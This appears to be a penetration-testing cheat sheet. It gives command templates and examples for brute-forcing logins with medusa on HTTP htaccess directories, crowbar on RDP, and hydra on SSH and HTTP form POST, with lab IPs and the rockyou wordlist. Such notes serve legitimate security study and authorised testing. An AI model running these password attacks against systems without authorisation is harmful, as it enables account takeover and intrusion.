====================
http htaccess attack
====================
medusa -h <target host> -u <username> -P <password wordlist> -M <protocol> -m DIR:<target directory>
	ex. medusa -h 10.11.0.22 -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin

display the guide
	medusa -d

==============
remove desktop
==============
crowbar -b <protocol> -s <target server> -u <username> -C <password wordlist> -n <thread number>
	ex. crowbar -b rdp -s 10.11.0.22/32 -u admin -C ~/password-file.txt -n 1
	*remote desktop doesn't reliably handle multiple threads

===
ssh
===
hydra -l <username> -P <wordlist> <service>://<target ip>
	ex. hydra -l kali -P ~/password-file.txt ssh://127.0.0.1

=========
http form
=========
get required arguments for hydra module
	hydra <module> -U

hydra <target ip or domain> <module> "<target page>:<form content>:<strings appearing with fail>" -l <username> -P <wordlist> -vV -f
	ex. hydra 10.11.0.22 http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f
